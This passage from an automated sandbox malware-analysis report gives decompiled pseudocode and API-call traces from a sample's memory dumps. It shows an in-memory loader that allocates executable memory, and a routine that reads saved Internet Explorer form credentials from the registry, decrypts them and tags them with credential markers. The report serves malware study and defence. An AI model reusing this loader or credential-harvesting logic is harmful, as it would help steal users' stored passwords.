    					if(( *(_t28 + 0x56) & 0x00000001) == 0) {
    						_t22 = VirtualAlloc(0, _t45, 0x3000, 0x40);
    						 *(_t28 + 0x148) = _t22;
    						 *((intOrPtr*)(_t28 + 0x144)) = _t22 - _t40;
    						goto L10;
    					} else {
    						return 4;
    					}
    				}
    			}

    APIs
    • VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040), ref: 01332256
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0133228B
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 10001700: lstrlenA.KERNEL32 ref: 10001725
      • Part of subcall function 10001700: HeapAlloc.KERNEL32(00000008,?), ref: 1000176D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001870
    • HeapFree.KERNEL32(00000000,00000000), ref: 1000187B
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 72%
    			E01333F89(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi) {
    				void* _t10;
    				intOrPtr _t12;
    				void* _t20;
    				void* _t27;
    				void* _t29;
    				void* _t31;
    				char _t35;
    				void* _t36;
    				intOrPtr* _t40;
    				void* _t44;
    				intOrPtr* _t51;
    				intOrPtr* _t52;
    				void* _t53;
    				intOrPtr* _t54;
    				void* _t55;
    
    				_t48 = __edi;
    				_t47 = __edx;
    				_t36 = __ecx;
    				E013348B0(__ebx, __edi, __esi, 0x1345af0, 0x14);
    				_t10 = E0133439D(_t36, __edx, 1); // executed
    				if(_t10 != 0) {
    					L2:
    					_t35 = 0;
    					 *((char*)(_t55 - 0x19)) = 0;
    					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    					 *((char*)(_t55 - 0x24)) = E01334368();
    					_t12 =  *0x1347b94; // 0x2
    					if(_t12 == 1) {
    						goto L1;
    					}
    					if(_t12 != 0) {
    						_t35 = 1;
    						 *((char*)(_t55 - 0x19)) = 1;
    						L8:
    						E013344F7( *((intOrPtr*)(_t55 - 0x24)));
    						_pop(_t40);
    						_t51 = E01334697();
    						if( *_t51 != 0) {
    							_t29 = E0133446D(_t35, 0, _t51);
    							_t40 = _t51;
    							if(_t29 != 0) {
    								_t54 =  *_t51;
    								_t40 = _t54;
    								L0133489C();
    								 *_t54(0, 2, 0);
    							}
    						}
    						_t52 = E0133469D();
    						if( *_t52 != 0) {
    							_t27 = E0133446D(_t35, 0, _t52);
    							_t40 = _t52;
    							if(_t27 != 0) {
    								E0133808B(_t35, _t47, 0, _t52,  *_t52);
    								_pop(_t40);
    							}
    						}
    						_push(E013347BE() & 0x0000ffff);
    						_push(E01337D27());
    						_push(0);
    						_push(0x1330000); // executed
    						_t20 = E013338C0(); // executed
    						_t53 = _t20;
    						if(E01337F9A() == 0) {
    							E013380C3(_t53); // executed
    						}
    						if(_t35 == 0) {
    							E01338066();
    						}
    						E01334514(_t40, 1, 0);
    						 *(_t55 - 4) = 0xfffffffe;
    						L19:
    						return E013348F6();
    					}
    					 *0x1347b94 = 1;
    					_t31 = E01337DC9(1, 0x1340150, 0x1340168); // executed
    					_pop(_t44);
    					if(_t31 == 0) {
    						E01337D6D(_t44, 0x1340144, 0x134014c); // executed
    						 *0x1347b94 = 2;
    						goto L8;
    					} else {
    						 *(_t55 - 4) = 0xfffffffe;
    						goto L19;
    					}
    				}
    				L1:
    				E013346A3(_t47, _t48, 7);
    				goto L2;
    			}

    APIs
      • Part of subcall function 013346A3: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013346B0
      • Part of subcall function 013346A3: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 01334778
      • Part of subcall function 013346A3: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01334797
      • Part of subcall function 013346A3: UnhandledExceptionFilter.KERNEL32(?), ref: 013347A1
    • ___scrt_get_show_window_mode.LIBCMT ref: 01334065
      • Part of subcall function 013347BE: GetStartupInfoW.KERNEL32(?), ref: 013347D8
      • Part of subcall function 013338C0: GetCommandLineW.KERNEL32 ref: 013338DF
      • Part of subcall function 013338C0: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 013338F3
      • Part of subcall function 013338C0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 01333A36
      • Part of subcall function 013338C0: WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 01333A74
      • Part of subcall function 013338C0: CloseHandle.KERNEL32(00000000), ref: 01333A7B
      • Part of subcall function 01337F9A: GetModuleHandleW.KERNEL32(00000000,01337E58,01345DD0,0000000C,01338086,00000003,00000002,00000000,?,013388CE,00000003,0133959B,?,?,00000000,00000000), ref: 01337F9C
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 1000DCD0: __alldiv.INT64 ref: 1000DD28
    • __alldiv.INT64 ref: 10011E60
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 88%
    			E01336A96(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t28;
    				signed int _t29;
    				signed int _t30;
    				signed int _t34;
    				intOrPtr* _t35;
    
    				_t20 = 0x1347c34 + _a4 * 4;
    				asm("lock cmpxchg [ebx], ecx");
    				_t28 =  *0x1347004; // 0x262637d3
    				_t30 = _t29 | 0xffffffff;
    				_t34 = _t28 ^ 0;
    				asm("ror esi, cl");
    				if(_t34 == _t30) {
    					L14:
    					return 0;
    				}
    				if(_t34 == 0) {
    					_t35 = _a12;
    					if(_t35 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t30 ^ _t28;
    							goto L14;
    						}
    						_t34 = GetProcAddress(_t13, _a8);
    						if(_t34 == 0) {
    							_t28 =  *0x1347004; // 0x262637d3
    							goto L13;
    						}
    						 *_t20 = E01336A79(_t34);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E01336B36( *_t35); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t35 = _t35 + 4;
    						if(_t35 != _a16) {
    							continue;
    						}
    						_t28 =  *0x1347004; // 0x262637d3
    						goto L7;
    					}
    					_t28 =  *0x1347004; // 0x262637d3
    					goto L8;
    				}
    				L2:
    				return _t34;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24,01347C08,00000FA0), ref: 01336AFA
      • Part of subcall function 01336B36: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,01347C08,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx), ref: 01336B6E
      • Part of subcall function 01336B36: GetLastError.KERNEL32(?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24), ref: 01336B7A
      • Part of subcall function 01336B36: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx), ref: 01336B88
      • Part of subcall function 01336B36: FreeLibrary.KERNEL32(00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000), ref: 01336BAA
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076,00000005,10083F29), ref: 1008432A
      • Part of subcall function 10084366: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree), ref: 1008439E
      • Part of subcall function 10084366: GetLastError.KERNEL32(?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076,00000005), ref: 100843AA
      • Part of subcall function 10084366: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000), ref: 100843B8
      • Part of subcall function 10084366: FreeLibrary.KERNEL32(00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076), ref: 100843DA
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 90%
    			E0133A66E(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t33;
    				intOrPtr* _t34;
    
    				_t20 = 0x13482d0 + _a4 * 4;
    				_t27 =  *0x1347004; // 0x262637d3
    				_t29 = _t28 | 0xffffffff;
    				_t33 = _t27 ^  *_t20;
    				asm("ror esi, cl");
    				if(_t33 == _t29) {
    					L14:
    					return 0;
    				}
    				if(_t33 == 0) {
    					_t34 = _a12;
    					if(_t34 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t29 ^ _t27;
    							goto L14;
    						}
    						_t33 = GetProcAddress(_t13, _a8);
    						if(_t33 == 0) {
    							_t27 =  *0x1347004; // 0x262637d3
    							goto L13;
    						}
    						 *_t20 = E01336A79(_t33);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E0133A70A( *_t34); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t34 = _t34 + 4;
    						if(_t34 != _a16) {
    							continue;
    						}
    						_t27 =  *0x1347004; // 0x262637d3
    						goto L7;
    					}
    					_t27 =  *0x1347004; // 0x262637d3
    					goto L8;
    				}
    				L2:
    				return _t33;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
      • Part of subcall function 0133A70A: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue), ref: 0133A73C
      • Part of subcall function 0133A70A: GetLastError.KERNEL32(?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA), ref: 0133A748
      • Part of subcall function 0133A70A: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000), ref: 0133A756
      • Part of subcall function 0133A70A: FreeLibrary.KERNEL32(00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364), ref: 0133A778
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
      • Part of subcall function 10086DB8: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,10084CC8,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue), ref: 10086DEA
      • Part of subcall function 10086DB8: GetLastError.KERNEL32(?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85), ref: 10086DF6
      • Part of subcall function 10086DB8: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000), ref: 10086E04
      • Part of subcall function 10086DB8: FreeLibrary.KERNEL32(00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364), ref: 10086E26
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 96%
    			E013326A0(void* __ecx) {
    				long _v8;
    				signed int _t15;
    				signed int _t17;
    				long _t18;
    				int _t21;
    				void* _t26;
    				void* _t32;
    				intOrPtr _t36;
    				unsigned int* _t38;
    
    				_push(__ecx);
    				_t26 = __ecx;
    				_t32 = 0;
    				_t36 =  *((intOrPtr*)(__ecx + 0x138));
    				if(0 >=  *((intOrPtr*)(__ecx + 0x46))) {
    					L13:
    					return 0;
    				} else {
    					_t38 = _t36 + 0x24;
    					do {
    						_t15 =  *_t38;
    						if((_t15 & 0x00000020) != 0) {
    							 *_t38 = _t15 | 0x60000000;
    						}
    						_t17 =  *_t38 >> 0x1d;
    						if(_t17 > 6) {
    							L10:
    							_t18 = 0x40;
    						} else {
    							switch( *((intOrPtr*)(_t17 * 4 +  &M01332740))) {
    								case 0:
    									goto L11;
    								case 1:
    									_t18 = 0x10;
    									goto L11;
    								case 2:
    									goto L11;
    								case 3:
    									goto L11;
    								case 4:
    									goto L10;
    							}
    						}
    						L11:
    						_v8 = _t18;
    						_t21 = VirtualProtect( *((intOrPtr*)(_t38 - 0x18)) +  *((intOrPtr*)(_t26 + 0x144)),  *(_t38 - 0x1c), _t18,  &_v8); // executed
    						if(_t21 == 0) {
    							return 9;
    						} else {
    							goto L12;
    						}
    						goto L15;
    						L12:
    						_t32 = _t32 + 1;
    						_t38 =  &(_t38[0xa]);
    					} while (_t32 < ( *(_t26 + 0x46) & 0x0000ffff));
    					goto L13;
    				}
    				L15:
    			}
    APIs
    • VirtualProtect.KERNELBASE(?,?,00000002,?), ref: 01332714
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 95%
    			E013388CF(void* __ecx, signed int _a4, signed int _a8) {
    				void* _t8;
    				void* _t12;
    				signed int _t13;
    				void* _t15;
    				signed int _t18;
    				long _t19;
    
    				_t15 = __ecx;
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x1348360, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E013381D5();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E013389A5())) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						_t12 = E01337519(_t15, __eflags, _t19);
    						_pop(_t15);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013395CD,00000001,00000364,?,?,01332133,?), ref: 01338910
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,10086BE1,00000001,00000364,?,10084CC8,1008215D,00000000,?,?,?,1008215D,00000000), ref: 1008651B
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 94%
    			E0133883E(void* __ecx, long _a4) {
    				void* _t4;
    				void* _t6;
    				void* _t7;
    				long _t8;
    
    				_t7 = __ecx;
    				_t8 = _a4;
    				if(_t8 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E013389A5())) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t8 == 0) {
    					_t8 = _t8 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x1348360, 0, _t8); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E013381D5();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					_t6 = E01337519(_t7, __eflags, _t8);
    					_pop(_t7);
    					__eflags = _t6;
    					if(_t6 == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}
    APIs
    • RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • HeapFree.KERNEL32(00000000,?), ref: 100044EE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Non-executed Functions

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,771CBFF8,76F846E9,00000000), ref: 10001116
    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 10001130
    • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 10001141
    • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 1000114E
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 10001159
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000014,00000000,?,00000000), ref: 10001181
    • wsprintfA.USER32 ref: 1000119D
    • wsprintfA.USER32 ref: 100011C6
    • CryptDestroyHash.ADVAPI32(00000000), ref: 100011D2
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 100011DD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • lstrlenW.KERNEL32(00000000,?,00000000,76F846E9), ref: 1000125A
      • Part of subcall function 100010C0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,771CBFF8,76F846E9,00000000), ref: 10001116
      • Part of subcall function 100010C0: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 10001130
      • Part of subcall function 100010C0: CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 10001141
      • Part of subcall function 100010C0: CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 1000114E
      • Part of subcall function 100010C0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 10001159
      • Part of subcall function 100010C0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000014,00000000,?,00000000), ref: 10001181
      • Part of subcall function 100010C0: wsprintfA.USER32 ref: 1000119D
      • Part of subcall function 100010C0: wsprintfA.USER32 ref: 100011C6
      • Part of subcall function 100010C0: CryptDestroyHash.ADVAPI32(00000000), ref: 100011D2
      • Part of subcall function 100010C0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 100011DD
      • Part of subcall function 10082020: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000101,10001298,76F846E9,00000000), ref: 10082057
      • Part of subcall function 10082020: RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 10082086
      • Part of subcall function 10082020: HeapAlloc.KERNEL32(00000008,-00000004,771CBFF8), ref: 100820A8
      • Part of subcall function 10082020: RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 100820CB
      • Part of subcall function 10082020: HeapFree.KERNEL32(00000000,00000000), ref: 100820E9
      • Part of subcall function 10082020: RegCloseKey.ADVAPI32(00000000), ref: 100820F8
    • lstrlenW.KERNEL32(00000000), ref: 100012FF
    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000132B
    • HeapFree.KERNEL32(00000000,00000000), ref: 1000133E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001355
      • Part of subcall function 10082210: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000014,00000010,?,1000140A), ref: 10082228
      • Part of subcall function 10082210: HeapAlloc.KERNEL32(00000008,0000000A), ref: 10082240
      • Part of subcall function 10082210: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10082258
      • Part of subcall function 10082210: HeapFree.KERNEL32(00000000,00000000), ref: 1008226E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001474
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000), ref: 1000144E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001465
    • LocalFree.KERNEL32(00000000), ref: 1000147D
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000101,10001298,76F846E9,00000000), ref: 10082057
    • RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 10082086
    • HeapAlloc.KERNEL32(00000008,-00000004,771CBFF8), ref: 100820A8
    • RegQueryValueExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000000), ref: 100820CB
    • HeapFree.KERNEL32(00000000,00000000), ref: 100820E9
    • RegCloseKey.ADVAPI32(00000000), ref: 100820F8
    Strings
    • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 10082036
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • __aulldiv.INT64 ref: 10005E3B
    • __aullrem.INT64 ref: 10005E67
    • __aulldvrm.INT64 ref: 10005EC6
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
